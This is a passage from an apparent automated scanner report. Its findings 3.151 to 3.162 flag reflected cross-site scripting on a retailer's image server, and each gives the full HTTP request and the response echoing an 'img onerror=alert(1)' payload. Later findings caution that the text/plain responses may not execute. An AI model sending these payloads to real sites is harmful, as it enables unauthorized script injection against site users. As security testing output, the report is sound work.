Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:21 GMT
Connection: close

Unable to find /pacsunproducts/8260952_01_0011cace<img src=a onerror=alert(1)>1bd330bfb20

3.151. http://images3.pacsun.com/is/image/pacsunproducts/8266561_01_048 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8266561_01_048

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 15073<img%20src%3da%20onerror%3dalert(1)>f2ab600da00 was submitted in the REST URL parameter 4. This input was echoed as 15073<img src=a onerror=alert(1)>f2ab600da00 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8266561_01_04815073<img%20src%3da%20onerror%3dalert(1)>f2ab600da00?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:24 GMT
Connection: close

Unable to find /pacsunproducts/8266561_01_04815073<img src=a onerror=alert(1)>f2ab600da00

3.152. http://images3.pacsun.com/is/image/pacsunproducts/8270852_01_008 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8270852_01_008

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2a01c<img%20src%3da%20onerror%3dalert(1)>c59a7bb49cf was submitted in the REST URL parameter 4. This input was echoed as 2a01c<img src=a onerror=alert(1)>c59a7bb49cf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8270852_01_0082a01c<img%20src%3da%20onerror%3dalert(1)>c59a7bb49cf?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:42 GMT
Connection: close

Unable to find /pacsunproducts/8270852_01_0082a01c<img src=a onerror=alert(1)>c59a7bb49cf

3.153. http://images3.pacsun.com/is/image/pacsunproducts/8270852_sw_008 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8270852_sw_008

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 30a03<img%20src%3da%20onerror%3dalert(1)>b779fe1f7b9 was submitted in the REST URL parameter 4. This input was echoed as 30a03<img src=a onerror=alert(1)>b779fe1f7b9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8270852_sw_00830a03<img%20src%3da%20onerror%3dalert(1)>b779fe1f7b9?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:41 GMT
Connection: close

Unable to find /pacsunproducts/8270852_sw_00830a03<img src=a onerror=alert(1)>b779fe1f7b9

3.154. http://images3.pacsun.com/is/image/pacsunproducts/8270852_sw_010 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8270852_sw_010

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d2df7<img%20src%3da%20onerror%3dalert(1)>13cbaaf6192 was submitted in the REST URL parameter 4. This input was echoed as d2df7<img src=a onerror=alert(1)>13cbaaf6192 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8270852_sw_010d2df7<img%20src%3da%20onerror%3dalert(1)>13cbaaf6192?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:42 GMT
Connection: close

Unable to find /pacsunproducts/8270852_sw_010d2df7<img src=a onerror=alert(1)>13cbaaf6192

3.155. http://images3.pacsun.com/is/image/pacsunproducts/8281289_01_066 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8281289_01_066

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 16b4a<img%20src%3da%20onerror%3dalert(1)>08531805115 was submitted in the REST URL parameter 4. This input was echoed as 16b4a<img src=a onerror=alert(1)>08531805115 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8281289_01_06616b4a<img%20src%3da%20onerror%3dalert(1)>08531805115?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:44 GMT
Connection: close

Unable to find /pacsunproducts/8281289_01_06616b4a<img src=a onerror=alert(1)>08531805115

3.156. http://images3.pacsun.com/is/image/pacsunproducts/8291395_01_040 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8291395_01_040

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1aa81<img%20src%3da%20onerror%3dalert(1)>32a833d8e88 was submitted in the REST URL parameter 4. This input was echoed as 1aa81<img src=a onerror=alert(1)>32a833d8e88 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8291395_01_0401aa81<img%20src%3da%20onerror%3dalert(1)>32a833d8e88?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:15 GMT
Connection: close

Unable to find /pacsunproducts/8291395_01_0401aa81<img src=a onerror=alert(1)>32a833d8e88

3.157. http://images3.pacsun.com/is/image/pacsunproducts/8301830_01_040 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8301830_01_040

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ae391<img%20src%3da%20onerror%3dalert(1)>b5d850ecb0a was submitted in the REST URL parameter 4. This input was echoed as ae391<img src=a onerror=alert(1)>b5d850ecb0a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8301830_01_040ae391<img%20src%3da%20onerror%3dalert(1)>b5d850ecb0a?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:20 GMT
Connection: close

Unable to find /pacsunproducts/8301830_01_040ae391<img src=a onerror=alert(1)>b5d850ecb0a

3.158. http://images3.pacsun.com/is/image/pacsunproducts/8301830_sw_040 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8301830_sw_040

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3ad42<img%20src%3da%20onerror%3dalert(1)>34c513cf0a4 was submitted in the REST URL parameter 4. This input was echoed as 3ad42<img src=a onerror=alert(1)>34c513cf0a4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8301830_sw_0403ad42<img%20src%3da%20onerror%3dalert(1)>34c513cf0a4?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:21 GMT
Connection: close

Unable to find /pacsunproducts/8301830_sw_0403ad42<img src=a onerror=alert(1)>34c513cf0a4

3.159. http://images3.pacsun.com/is/image/pacsunproducts/8301830_sw_070 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8301830_sw_070

Issue detail

The value of REST URL parameter 4 is copied unencoded into the response body. The payload ffe7a<img%20src%3da%20onerror%3dalert(1)>61eb2ed236 was submitted in the REST URL parameter 4 and was echoed as ffe7a<img src=a onerror=alert(1)>61eb2ed236 in the application's response.

The echoed payload uses an event handler to introduce JavaScript, so it would execute if the response were parsed as HTML. The recorded response, however, is a 403 served as Content-Type: text/plain; a browser that honours the declared type renders the markup as text, so exploitability depends on content sniffing in older browsers and should be confirmed in a browser before the High/Certain rating is accepted.

Request

GET /is/image/pacsunproducts/8301830_sw_070ffe7a<img%20src%3da%20onerror%3dalert(1)>61eb2ed236?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 88
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:21 GMT
Connection: close

Unable to find /pacsunproducts/8301830_sw_070ffe7a<img src=a onerror=alert(1)>61eb2ed236

3.160. http://images3.pacsun.com/is/image/pacsunproducts/8332694_01 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8332694_01

Issue detail

The value of REST URL parameter 4 is copied unencoded into the response body. The payload a7c25<img%20src%3da%20onerror%3dalert(1)>bf4a77e9564 was submitted in the REST URL parameter 4 and was echoed as a7c25<img src=a onerror=alert(1)>bf4a77e9564 in the application's response.

The echoed payload uses an event handler to introduce JavaScript, so it would execute if the response were parsed as HTML. The recorded response, however, is a 403 served as Content-Type: text/plain; a browser that honours the declared type renders the markup as text, so exploitability depends on content sniffing in older browsers and should be confirmed in a browser before the High/Certain rating is accepted.

Request

GET /is/image/pacsunproducts/8332694_01a7c25<img%20src%3da%20onerror%3dalert(1)>bf4a77e9564?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:16 GMT
Connection: close

Unable to find /pacsunproducts/8332694_01a7c25<img src=a onerror=alert(1)>bf4a77e9564

3.161. http://images3.pacsun.com/is/image/pacsunproducts/8335093_01 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8335093_01

Issue detail

The value of REST URL parameter 4 is copied unencoded into the response body. The payload bb82c<img%20src%3da%20onerror%3dalert(1)>574c67e7dbe was submitted in the REST URL parameter 4 and was echoed as bb82c<img src=a onerror=alert(1)>574c67e7dbe in the application's response.

The echoed payload uses an event handler to introduce JavaScript, so it would execute if the response were parsed as HTML. The recorded response, however, is a 403 served as Content-Type: text/plain; a browser that honours the declared type renders the markup as text, so exploitability depends on content sniffing in older browsers and should be confirmed in a browser before the High/Certain rating is accepted.

Request

GET /is/image/pacsunproducts/8335093_01bb82c<img%20src%3da%20onerror%3dalert(1)>574c67e7dbe?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:46 GMT
Connection: close

Unable to find /pacsunproducts/8335093_01bb82c<img src=a onerror=alert(1)>574c67e7dbe

3.162. http://images3.pacsun.com/is/image/pacsunproducts/8335697_01 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8335697_01

Issue detail

The value of REST URL parameter 4 is copied unencoded into the response body. The payload 27c18<img%20src%3da%20onerror%3dalert(1)>e49400a6971 was submitted in the REST URL parameter 4 and was echoed as 27c18<img src=a onerror=alert(1)>e49400a6971 in the application's response.

The echoed payload uses an event handler to introduce JavaScript, so it would execute if the response were parsed as HTML. The recorded response, however, is a 403 served as Content-Type: text/plain; a browser that honours the declared type renders the markup as text, so exploitability depends on content sniffing in older browsers and should be confirmed in a browser before the High/Certain rating is accepted.

Request

GET /is/image/pacsunproducts/8335697_0127c18<img%20src%3da%20onerror%3dalert(1)>e49400a6971?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
